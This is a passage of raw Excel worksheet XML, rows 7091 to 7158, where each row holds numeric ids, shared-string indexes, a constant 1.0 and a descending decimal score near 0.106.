      </c>
      <c r="F7091" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="7092" ht="15.75" customHeight="1">
      <c r="A7092" s="1">
        <v>9087.0</v>
      </c>
      <c r="B7092" s="2">
        <v>5.5124202E7</v>
      </c>
      <c r="C7092" s="2" t="s">
        <v>6730</v>
      </c>
      <c r="D7092" s="2">
        <v>1.0</v>
      </c>
      <c r="E7092" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7092" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="7093" ht="15.75" customHeight="1">
      <c r="A7093" s="1">
        <v>23383.0</v>
      </c>
      <c r="B7093" s="2">
        <v>5.5592601E7</v>
      </c>
      <c r="C7093" s="2" t="s">
        <v>6731</v>
      </c>
      <c r="D7093" s="2">
        <v>1.0</v>
      </c>
      <c r="E7093" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7093" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="7094" ht="15.75" customHeight="1">
      <c r="A7094" s="1">
        <v>30320.0</v>
      </c>
      <c r="B7094" s="2">
        <v>3.8037751E7</v>
      </c>
      <c r="C7094" s="2" t="s">
        <v>6732</v>
      </c>
      <c r="D7094" s="2">
        <v>1.0</v>
      </c>
      <c r="E7094" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7094" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="7095" ht="15.75" customHeight="1">
      <c r="A7095" s="1">
        <v>27993.0</v>
      </c>
      <c r="B7095" s="2">
        <v>2.4202799E7</v>
      </c>
      <c r="C7095" s="2" t="s">
        <v>6733</v>
      </c>
      <c r="D7095" s="2">
        <v>1.0</v>
      </c>
      <c r="E7095" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7095" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="7096" ht="15.75" customHeight="1">
      <c r="A7096" s="1">
        <v>680.0</v>
      </c>
      <c r="B7096" s="2">
        <v>2.0273452E7</v>
      </c>
      <c r="C7096" s="2" t="s">
        <v>6734</v>
      </c>
      <c r="D7096" s="2">
        <v>1.0</v>
      </c>
      <c r="E7096" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7096" s="2">
        <v>0.1066308243727599</v>
      </c>
    </row>
    <row r="7097" ht="15.75" customHeight="1">
      <c r="A7097" s="1">
        <v>6111.0</v>
      </c>
      <c r="B7097" s="2">
        <v>4.7759419E7</v>
      </c>
      <c r="C7097" s="2" t="s">
        <v>6735</v>
      </c>
      <c r="D7097" s="2">
        <v>1.0</v>
      </c>
      <c r="E7097" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7097" s="2">
        <v>0.1065573770491803</v>
      </c>
    </row>
    <row r="7098" ht="15.75" customHeight="1">
      <c r="A7098" s="1">
        <v>26916.0</v>
      </c>
      <c r="B7098" s="2">
        <v>1.9368713E7</v>
      </c>
      <c r="C7098" s="2" t="s">
        <v>6736</v>
      </c>
      <c r="D7098" s="2">
        <v>1.0</v>
      </c>
      <c r="E7098" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7098" s="2">
        <v>0.1065573770491803</v>
      </c>
    </row>
    <row r="7099" ht="15.75" customHeight="1">
      <c r="A7099" s="1">
        <v>8524.0</v>
      </c>
      <c r="B7099" s="2">
        <v>5.4091829E7</v>
      </c>
      <c r="C7099" s="2" t="s">
        <v>6737</v>
      </c>
      <c r="D7099" s="2">
        <v>1.0</v>
      </c>
      <c r="E7099" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7099" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="7100" ht="15.75" customHeight="1">
      <c r="A7100" s="1">
        <v>27302.0</v>
      </c>
      <c r="B7100" s="2">
        <v>2.133886E7</v>
      </c>
      <c r="C7100" s="2" t="s">
        <v>6738</v>
      </c>
      <c r="D7100" s="2">
        <v>1.0</v>
      </c>
      <c r="E7100" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7100" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="7101" ht="15.75" customHeight="1">
      <c r="A7101" s="1">
        <v>25729.0</v>
      </c>
      <c r="B7101" s="2">
        <v>1.4550211E7</v>
      </c>
      <c r="C7101" s="2" t="s">
        <v>6739</v>
      </c>
      <c r="D7101" s="2">
        <v>1.0</v>
      </c>
      <c r="E7101" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7101" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="7102" ht="15.75" customHeight="1">
      <c r="A7102" s="1">
        <v>28442.0</v>
      </c>
      <c r="B7102" s="2">
        <v>2.6516283E7</v>
      </c>
      <c r="C7102" s="2" t="s">
        <v>6740</v>
      </c>
      <c r="D7102" s="2">
        <v>1.0</v>
      </c>
      <c r="E7102" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7102" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="7103" ht="15.75" customHeight="1">
      <c r="A7103" s="1">
        <v>33966.0</v>
      </c>
      <c r="B7103" s="2">
        <v>9352908.0</v>
      </c>
      <c r="C7103" s="2" t="s">
        <v>6644</v>
      </c>
      <c r="D7103" s="2">
        <v>1.0</v>
      </c>
      <c r="E7103" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7103" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="7104" ht="15.75" customHeight="1">
      <c r="A7104" s="1">
        <v>10788.0</v>
      </c>
      <c r="B7104" s="2">
        <v>1.5698585E7</v>
      </c>
      <c r="C7104" s="2" t="s">
        <v>6741</v>
      </c>
      <c r="D7104" s="2">
        <v>1.0</v>
      </c>
      <c r="E7104" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7104" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="7105" ht="15.75" customHeight="1">
      <c r="A7105" s="1">
        <v>18624.0</v>
      </c>
      <c r="B7105" s="2">
        <v>5.3355492E7</v>
      </c>
      <c r="C7105" s="2" t="s">
        <v>6742</v>
      </c>
      <c r="D7105" s="2">
        <v>1.0</v>
      </c>
      <c r="E7105" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7105" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="7106" ht="15.75" customHeight="1">
      <c r="A7106" s="1">
        <v>21442.0</v>
      </c>
      <c r="B7106" s="2">
        <v>2.2396944E7</v>
      </c>
      <c r="C7106" s="2" t="s">
        <v>6743</v>
      </c>
      <c r="D7106" s="2">
        <v>1.0</v>
      </c>
      <c r="E7106" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7106" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="7107" ht="15.75" customHeight="1">
      <c r="A7107" s="1">
        <v>22496.0</v>
      </c>
      <c r="B7107" s="2">
        <v>3716327.0</v>
      </c>
      <c r="C7107" s="2" t="s">
        <v>6744</v>
      </c>
      <c r="D7107" s="2">
        <v>1.0</v>
      </c>
      <c r="E7107" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7107" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="7108" ht="15.75" customHeight="1">
      <c r="A7108" s="1">
        <v>23665.0</v>
      </c>
      <c r="B7108" s="2">
        <v>6839235.0</v>
      </c>
      <c r="C7108" s="2" t="s">
        <v>6745</v>
      </c>
      <c r="D7108" s="2">
        <v>1.0</v>
      </c>
      <c r="E7108" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7108" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="7109" ht="15.75" customHeight="1">
      <c r="A7109" s="1">
        <v>26364.0</v>
      </c>
      <c r="B7109" s="2">
        <v>1.6866656E7</v>
      </c>
      <c r="C7109" s="2" t="s">
        <v>6746</v>
      </c>
      <c r="D7109" s="2">
        <v>1.0</v>
      </c>
      <c r="E7109" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7109" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="7110" ht="15.75" customHeight="1">
      <c r="A7110" s="1">
        <v>27554.0</v>
      </c>
      <c r="B7110" s="2">
        <v>2.2396943E7</v>
      </c>
      <c r="C7110" s="2" t="s">
        <v>6743</v>
      </c>
      <c r="D7110" s="2">
        <v>1.0</v>
      </c>
      <c r="E7110" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7110" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="7111" ht="15.75" customHeight="1">
      <c r="A7111" s="1">
        <v>29053.0</v>
      </c>
      <c r="B7111" s="2">
        <v>3.0235337E7</v>
      </c>
      <c r="C7111" s="2" t="s">
        <v>6747</v>
      </c>
      <c r="D7111" s="2">
        <v>1.0</v>
      </c>
      <c r="E7111" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7111" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="7112" ht="15.75" customHeight="1">
      <c r="A7112" s="1">
        <v>29486.0</v>
      </c>
      <c r="B7112" s="2">
        <v>3.2494399E7</v>
      </c>
      <c r="C7112" s="2" t="s">
        <v>6748</v>
      </c>
      <c r="D7112" s="2">
        <v>1.0</v>
      </c>
      <c r="E7112" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7112" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="7113" ht="15.75" customHeight="1">
      <c r="A7113" s="1">
        <v>32442.0</v>
      </c>
      <c r="B7113" s="2">
        <v>5.665478E7</v>
      </c>
      <c r="C7113" s="2" t="s">
        <v>6749</v>
      </c>
      <c r="D7113" s="2">
        <v>1.0</v>
      </c>
      <c r="E7113" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7113" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="7114" ht="15.75" customHeight="1">
      <c r="A7114" s="1">
        <v>34219.0</v>
      </c>
      <c r="B7114" s="2">
        <v>4.0473927E7</v>
      </c>
      <c r="C7114" s="2" t="s">
        <v>6750</v>
      </c>
      <c r="D7114" s="2">
        <v>1.0</v>
      </c>
      <c r="E7114" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7114" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="7115" ht="15.75" customHeight="1">
      <c r="A7115" s="1">
        <v>6365.0</v>
      </c>
      <c r="B7115" s="2">
        <v>4.8373705E7</v>
      </c>
      <c r="C7115" s="2" t="s">
        <v>6751</v>
      </c>
      <c r="D7115" s="2">
        <v>1.0</v>
      </c>
      <c r="E7115" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7115" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="7116" ht="15.75" customHeight="1">
      <c r="A7116" s="1">
        <v>6744.0</v>
      </c>
      <c r="B7116" s="2">
        <v>4.9375721E7</v>
      </c>
      <c r="C7116" s="2" t="s">
        <v>6752</v>
      </c>
      <c r="D7116" s="2">
        <v>1.0</v>
      </c>
      <c r="E7116" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7116" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="7117" ht="15.75" customHeight="1">
      <c r="A7117" s="1">
        <v>23281.0</v>
      </c>
      <c r="B7117" s="2">
        <v>5.3702494E7</v>
      </c>
      <c r="C7117" s="2" t="s">
        <v>6753</v>
      </c>
      <c r="D7117" s="2">
        <v>1.0</v>
      </c>
      <c r="E7117" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7117" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="7118" ht="15.75" customHeight="1">
      <c r="A7118" s="1">
        <v>27777.0</v>
      </c>
      <c r="B7118" s="2">
        <v>2.3117882E7</v>
      </c>
      <c r="C7118" s="2" t="s">
        <v>6754</v>
      </c>
      <c r="D7118" s="2">
        <v>1.0</v>
      </c>
      <c r="E7118" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7118" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="7119" ht="15.75" customHeight="1">
      <c r="A7119" s="1">
        <v>29510.0</v>
      </c>
      <c r="B7119" s="2">
        <v>3.2761843E7</v>
      </c>
      <c r="C7119" s="2" t="s">
        <v>6755</v>
      </c>
      <c r="D7119" s="2">
        <v>1.0</v>
      </c>
      <c r="E7119" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7119" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="7120" ht="15.75" customHeight="1">
      <c r="A7120" s="1">
        <v>29848.0</v>
      </c>
      <c r="B7120" s="2">
        <v>3.570086E7</v>
      </c>
      <c r="C7120" s="2" t="s">
        <v>6756</v>
      </c>
      <c r="D7120" s="2">
        <v>1.0</v>
      </c>
      <c r="E7120" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7120" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="7121" ht="15.75" customHeight="1">
      <c r="A7121" s="1">
        <v>30238.0</v>
      </c>
      <c r="B7121" s="2">
        <v>3.74744E7</v>
      </c>
      <c r="C7121" s="2" t="s">
        <v>6757</v>
      </c>
      <c r="D7121" s="2">
        <v>1.0</v>
      </c>
      <c r="E7121" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7121" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="7122" ht="15.75" customHeight="1">
      <c r="A7122" s="1">
        <v>31304.0</v>
      </c>
      <c r="B7122" s="2">
        <v>4967863.0</v>
      </c>
      <c r="C7122" s="2" t="s">
        <v>6758</v>
      </c>
      <c r="D7122" s="2">
        <v>1.0</v>
      </c>
      <c r="E7122" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7122" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="7123" ht="15.75" customHeight="1">
      <c r="A7123" s="1">
        <v>32364.0</v>
      </c>
      <c r="B7123" s="2">
        <v>5.5948391E7</v>
      </c>
      <c r="C7123" s="2" t="s">
        <v>6759</v>
      </c>
      <c r="D7123" s="2">
        <v>1.0</v>
      </c>
      <c r="E7123" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7123" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="7124" ht="15.75" customHeight="1">
      <c r="A7124" s="1">
        <v>5210.0</v>
      </c>
      <c r="B7124" s="2">
        <v>4.4937512E7</v>
      </c>
      <c r="C7124" s="2" t="s">
        <v>6760</v>
      </c>
      <c r="D7124" s="2">
        <v>1.0</v>
      </c>
      <c r="E7124" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7124" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="7125" ht="15.75" customHeight="1">
      <c r="A7125" s="1">
        <v>14184.0</v>
      </c>
      <c r="B7125" s="2">
        <v>3.8126196E7</v>
      </c>
      <c r="C7125" s="2" t="s">
        <v>6761</v>
      </c>
      <c r="D7125" s="2">
        <v>1.0</v>
      </c>
      <c r="E7125" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7125" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="7126" ht="15.75" customHeight="1">
      <c r="A7126" s="1">
        <v>29576.0</v>
      </c>
      <c r="B7126" s="2">
        <v>3.3414656E7</v>
      </c>
      <c r="C7126" s="2" t="s">
        <v>6762</v>
      </c>
      <c r="D7126" s="2">
        <v>1.0</v>
      </c>
      <c r="E7126" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7126" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="7127" ht="15.75" customHeight="1">
      <c r="A7127" s="1">
        <v>31564.0</v>
      </c>
      <c r="B7127" s="2">
        <v>5121429.0</v>
      </c>
      <c r="C7127" s="2" t="s">
        <v>6763</v>
      </c>
      <c r="D7127" s="2">
        <v>1.0</v>
      </c>
      <c r="E7127" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7127" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="7128" ht="15.75" customHeight="1">
      <c r="A7128" s="1">
        <v>7665.0</v>
      </c>
      <c r="B7128" s="2">
        <v>5.1847136E7</v>
      </c>
      <c r="C7128" s="2" t="s">
        <v>6764</v>
      </c>
      <c r="D7128" s="2">
        <v>1.0</v>
      </c>
      <c r="E7128" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7128" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="7129" ht="15.75" customHeight="1">
      <c r="A7129" s="1">
        <v>7980.0</v>
      </c>
      <c r="B7129" s="2">
        <v>5.2721357E7</v>
      </c>
      <c r="C7129" s="2" t="s">
        <v>6765</v>
      </c>
      <c r="D7129" s="2">
        <v>1.0</v>
      </c>
      <c r="E7129" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7129" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="7130" ht="15.75" customHeight="1">
      <c r="A7130" s="1">
        <v>8856.0</v>
      </c>
      <c r="B7130" s="2">
        <v>5.4728193E7</v>
      </c>
      <c r="C7130" s="2" t="s">
        <v>6653</v>
      </c>
      <c r="D7130" s="2">
        <v>1.0</v>
      </c>
      <c r="E7130" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7130" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="7131" ht="15.75" customHeight="1">
      <c r="A7131" s="1">
        <v>12007.0</v>
      </c>
      <c r="B7131" s="2">
        <v>2.5964693E7</v>
      </c>
      <c r="C7131" s="2" t="s">
        <v>6766</v>
      </c>
      <c r="D7131" s="2">
        <v>1.0</v>
      </c>
      <c r="E7131" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7131" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="7132" ht="15.75" customHeight="1">
      <c r="A7132" s="1">
        <v>16614.0</v>
      </c>
      <c r="B7132" s="2">
        <v>4.7063725E7</v>
      </c>
      <c r="C7132" s="2" t="s">
        <v>6767</v>
      </c>
      <c r="D7132" s="2">
        <v>1.0</v>
      </c>
      <c r="E7132" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7132" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="7133" ht="15.75" customHeight="1">
      <c r="A7133" s="1">
        <v>22359.0</v>
      </c>
      <c r="B7133" s="2">
        <v>3.4685478E7</v>
      </c>
      <c r="C7133" s="2" t="s">
        <v>6768</v>
      </c>
      <c r="D7133" s="2">
        <v>1.0</v>
      </c>
      <c r="E7133" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7133" s="2">
        <v>0.1061507936507937</v>
      </c>
    </row>
    <row r="7134" ht="15.75" customHeight="1">
      <c r="A7134" s="1">
        <v>29550.0</v>
      </c>
      <c r="B7134" s="2">
        <v>3.3077829E7</v>
      </c>
      <c r="C7134" s="2" t="s">
        <v>6769</v>
      </c>
      <c r="D7134" s="2">
        <v>1.0</v>
      </c>
      <c r="E7134" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7134" s="2">
        <v>0.1061507936507937</v>
      </c>
    </row>
    <row r="7135" ht="15.75" customHeight="1">
      <c r="A7135" s="1">
        <v>6328.0</v>
      </c>
      <c r="B7135" s="2">
        <v>4.8287136E7</v>
      </c>
      <c r="C7135" s="2" t="s">
        <v>6770</v>
      </c>
      <c r="D7135" s="2">
        <v>1.0</v>
      </c>
      <c r="E7135" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7135" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="7136" ht="15.75" customHeight="1">
      <c r="A7136" s="1">
        <v>6959.0</v>
      </c>
      <c r="B7136" s="2">
        <v>4.9979785E7</v>
      </c>
      <c r="C7136" s="2" t="s">
        <v>6771</v>
      </c>
      <c r="D7136" s="2">
        <v>1.0</v>
      </c>
      <c r="E7136" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7136" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="7137" ht="15.75" customHeight="1">
      <c r="A7137" s="1">
        <v>14521.0</v>
      </c>
      <c r="B7137" s="2">
        <v>3.9782191E7</v>
      </c>
      <c r="C7137" s="2" t="s">
        <v>6772</v>
      </c>
      <c r="D7137" s="2">
        <v>1.0</v>
      </c>
      <c r="E7137" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7137" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="7138" ht="15.75" customHeight="1">
      <c r="A7138" s="1">
        <v>20996.0</v>
      </c>
      <c r="B7138" s="2">
        <v>1.7142114E7</v>
      </c>
      <c r="C7138" s="2" t="s">
        <v>6773</v>
      </c>
      <c r="D7138" s="2">
        <v>1.0</v>
      </c>
      <c r="E7138" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7138" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="7139" ht="15.75" customHeight="1">
      <c r="A7139" s="1">
        <v>22073.0</v>
      </c>
      <c r="B7139" s="2">
        <v>3.0603919E7</v>
      </c>
      <c r="C7139" s="2" t="s">
        <v>6774</v>
      </c>
      <c r="D7139" s="2">
        <v>1.0</v>
      </c>
      <c r="E7139" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7139" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="7140" ht="15.75" customHeight="1">
      <c r="A7140" s="1">
        <v>22890.0</v>
      </c>
      <c r="B7140" s="2">
        <v>4.7846129E7</v>
      </c>
      <c r="C7140" s="2" t="s">
        <v>6775</v>
      </c>
      <c r="D7140" s="2">
        <v>1.0</v>
      </c>
      <c r="E7140" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7140" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="7141" ht="15.75" customHeight="1">
      <c r="A7141" s="1">
        <v>25369.0</v>
      </c>
      <c r="B7141" s="2">
        <v>1.3605356E7</v>
      </c>
      <c r="C7141" s="2" t="s">
        <v>6776</v>
      </c>
      <c r="D7141" s="2">
        <v>1.0</v>
      </c>
      <c r="E7141" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7141" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="7142" ht="15.75" customHeight="1">
      <c r="A7142" s="1">
        <v>25958.0</v>
      </c>
      <c r="B7142" s="2">
        <v>1.5266842E7</v>
      </c>
      <c r="C7142" s="2" t="s">
        <v>6777</v>
      </c>
      <c r="D7142" s="2">
        <v>1.0</v>
      </c>
      <c r="E7142" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7142" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="7143" ht="15.75" customHeight="1">
      <c r="A7143" s="1">
        <v>33897.0</v>
      </c>
      <c r="B7143" s="2">
        <v>9197476.0</v>
      </c>
      <c r="C7143" s="2" t="s">
        <v>6778</v>
      </c>
      <c r="D7143" s="2">
        <v>1.0</v>
      </c>
      <c r="E7143" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7143" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="7144" ht="15.75" customHeight="1">
      <c r="A7144" s="1">
        <v>25186.0</v>
      </c>
      <c r="B7144" s="2">
        <v>1.3138002E7</v>
      </c>
      <c r="C7144" s="2" t="s">
        <v>6779</v>
      </c>
      <c r="D7144" s="2">
        <v>1.0</v>
      </c>
      <c r="E7144" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7144" s="2">
        <v>0.1060606060606061</v>
      </c>
    </row>
    <row r="7145" ht="15.75" customHeight="1">
      <c r="A7145" s="1">
        <v>7032.0</v>
      </c>
      <c r="B7145" s="2">
        <v>5.0128642E7</v>
      </c>
      <c r="C7145" s="2" t="s">
        <v>6780</v>
      </c>
      <c r="D7145" s="2">
        <v>1.0</v>
      </c>
      <c r="E7145" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7145" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="7146" ht="15.75" customHeight="1">
      <c r="A7146" s="1">
        <v>21603.0</v>
      </c>
      <c r="B7146" s="2">
        <v>2.4224603E7</v>
      </c>
      <c r="C7146" s="2" t="s">
        <v>6613</v>
      </c>
      <c r="D7146" s="2">
        <v>1.0</v>
      </c>
      <c r="E7146" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7146" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="7147" ht="15.75" customHeight="1">
      <c r="A7147" s="1">
        <v>25860.0</v>
      </c>
      <c r="B7147" s="2">
        <v>1.4878802E7</v>
      </c>
      <c r="C7147" s="2" t="s">
        <v>6781</v>
      </c>
      <c r="D7147" s="2">
        <v>1.0</v>
      </c>
      <c r="E7147" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7147" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="7148" ht="15.75" customHeight="1">
      <c r="A7148" s="1">
        <v>25889.0</v>
      </c>
      <c r="B7148" s="2">
        <v>1.498375E7</v>
      </c>
      <c r="C7148" s="2" t="s">
        <v>6421</v>
      </c>
      <c r="D7148" s="2">
        <v>1.0</v>
      </c>
      <c r="E7148" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7148" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="7149" ht="15.75" customHeight="1">
      <c r="A7149" s="1">
        <v>29038.0</v>
      </c>
      <c r="B7149" s="2">
        <v>3.0159551E7</v>
      </c>
      <c r="C7149" s="2" t="s">
        <v>6782</v>
      </c>
      <c r="D7149" s="2">
        <v>1.0</v>
      </c>
      <c r="E7149" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7149" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="7150" ht="15.75" customHeight="1">
      <c r="A7150" s="1">
        <v>30820.0</v>
      </c>
      <c r="B7150" s="2">
        <v>4.5372738E7</v>
      </c>
      <c r="C7150" s="2" t="s">
        <v>6783</v>
      </c>
      <c r="D7150" s="2">
        <v>1.0</v>
      </c>
      <c r="E7150" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7150" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="7151" ht="15.75" customHeight="1">
      <c r="A7151" s="1">
        <v>18531.0</v>
      </c>
      <c r="B7151" s="2">
        <v>5.3076323E7</v>
      </c>
      <c r="C7151" s="2" t="s">
        <v>6784</v>
      </c>
      <c r="D7151" s="2">
        <v>1.0</v>
      </c>
      <c r="E7151" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7151" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="7152" ht="15.75" customHeight="1">
      <c r="A7152" s="1">
        <v>19934.0</v>
      </c>
      <c r="B7152" s="2">
        <v>5.7438178E7</v>
      </c>
      <c r="C7152" s="2" t="s">
        <v>6785</v>
      </c>
      <c r="D7152" s="2">
        <v>1.0</v>
      </c>
      <c r="E7152" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7152" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="7153" ht="15.75" customHeight="1">
      <c r="A7153" s="1">
        <v>22387.0</v>
      </c>
      <c r="B7153" s="2">
        <v>3.5313605E7</v>
      </c>
      <c r="C7153" s="2" t="s">
        <v>6786</v>
      </c>
      <c r="D7153" s="2">
        <v>1.0</v>
      </c>
      <c r="E7153" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7153" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="7154" ht="15.75" customHeight="1">
      <c r="A7154" s="1">
        <v>23690.0</v>
      </c>
      <c r="B7154" s="2">
        <v>7052241.0</v>
      </c>
      <c r="C7154" s="2" t="s">
        <v>6787</v>
      </c>
      <c r="D7154" s="2">
        <v>1.0</v>
      </c>
      <c r="E7154" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7154" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="7155" ht="15.75" customHeight="1">
      <c r="A7155" s="1">
        <v>33051.0</v>
      </c>
      <c r="B7155" s="2">
        <v>6779608.0</v>
      </c>
      <c r="C7155" s="2" t="s">
        <v>6788</v>
      </c>
      <c r="D7155" s="2">
        <v>1.0</v>
      </c>
      <c r="E7155" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7155" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="7156" ht="15.75" customHeight="1">
      <c r="A7156" s="1">
        <v>33318.0</v>
      </c>
      <c r="B7156" s="2">
        <v>7532732.0</v>
      </c>
      <c r="C7156" s="2" t="s">
        <v>6789</v>
      </c>
      <c r="D7156" s="2">
        <v>1.0</v>
      </c>
      <c r="E7156" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7156" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="7157" ht="15.75" customHeight="1">
      <c r="A7157" s="1">
        <v>2186.0</v>
      </c>
      <c r="B7157" s="2">
        <v>3.1883961E7</v>
      </c>
      <c r="C7157" s="2" t="s">
        <v>6790</v>
      </c>
      <c r="D7157" s="2">
        <v>1.0</v>
      </c>
      <c r="E7157" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7157" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="7158" ht="15.75" customHeight="1">
      <c r="A7158" s="1">
        <v>10389.0</v>
      </c>
      <c r="B7158" s="2">
        <v>8543772.0</v>
      </c>
      <c r="C7158" s="2" t="s">
        <v>6791</v>
      </c>
      <c r="D7158" s="2">
        <v>1.0</v>
      </c>
      <c r="E7158" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7158" s="2">
